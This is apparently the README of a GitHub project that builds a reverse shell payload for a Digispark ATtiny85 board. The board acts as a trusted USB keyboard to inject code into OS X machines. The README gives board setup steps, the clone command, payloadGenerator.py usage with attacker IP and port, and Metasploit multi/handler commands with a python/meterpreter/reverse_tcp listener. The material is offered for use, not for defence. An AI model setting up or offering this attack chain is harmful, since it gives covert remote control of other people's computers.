Digispark is a Attiny85 based microcontroller that can be used as a trusted HID-MIDI device. This project addresses its vulnerability, which injects malicious code into the machine.
The script creates either a reverse shell python script or arduino sketch for digispark. The script is compatible with metasploit.
This Digispark sketch is intended to run on OS X operating System.
- Creates a reverse shell python script
- Creates a Arduino sketch for digispark
To flash the microcontroller, you need to add this link to your boards maneger
Arduino > File > Preferences > Additional Boards Manager URLs:
Once the link is added, head over to Tools > Bord > Boards Manager, search for "Digistump AVR Boards" and make sure it is installed.
Clone this repository
git clone https://github.com/https-sam/digispark_reverse_shell.git
cd scripts
-p and -i tags
are required.
python3 payloadGenerator.py -i IP ADDRESS -p PORT
-py True
is optional, which only creates a python reverse shell script.
python3 payloadGenerator.py -i IP Address -p PORT -py True
Metsploit can be used as a listener
use multi/handler
set payload python/meterpreter/reverse_tcp
set lhost
set lport PORT
- Digistump - Library for digispark
- Micronucleus - processor
- Metasploit